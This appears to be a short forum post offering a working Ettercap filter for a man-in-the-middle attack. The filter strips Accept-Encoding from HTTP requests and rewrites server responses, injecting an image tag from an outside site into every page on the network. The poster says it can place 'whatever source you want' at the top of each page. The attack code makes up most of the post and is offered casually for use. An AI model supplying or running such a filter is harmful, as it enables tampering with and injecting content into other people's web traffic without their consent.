ill go ahead and throw you a cookie... this filter will put what ever source you want at the top of each page...
compile that and then launch ettercap...Code:if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "</title>")) { replace("</title>", "</title><img src="http://www.meandmyspace.com/files/en/comments1/good.night/bed_time.gif" />"); msg("script injected"); }}



